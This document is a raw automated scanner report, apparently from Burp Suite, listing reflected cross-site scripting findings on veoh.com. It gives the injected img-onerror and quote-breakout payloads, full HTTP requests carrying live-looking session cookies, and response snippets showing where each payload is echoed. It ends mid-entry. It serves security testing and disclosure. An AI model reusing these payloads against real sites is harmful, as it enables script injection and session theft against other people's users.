GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=42 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=68 Content-Length: 74599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=70 Content-Length: 74555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 94049
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=69 Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:34:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 57867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 57833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:18 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=40 Content-Length: 76933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:14 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=93 Content-Length: 76573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:51 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 74501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=12 Content-Length: 74545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 93332
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
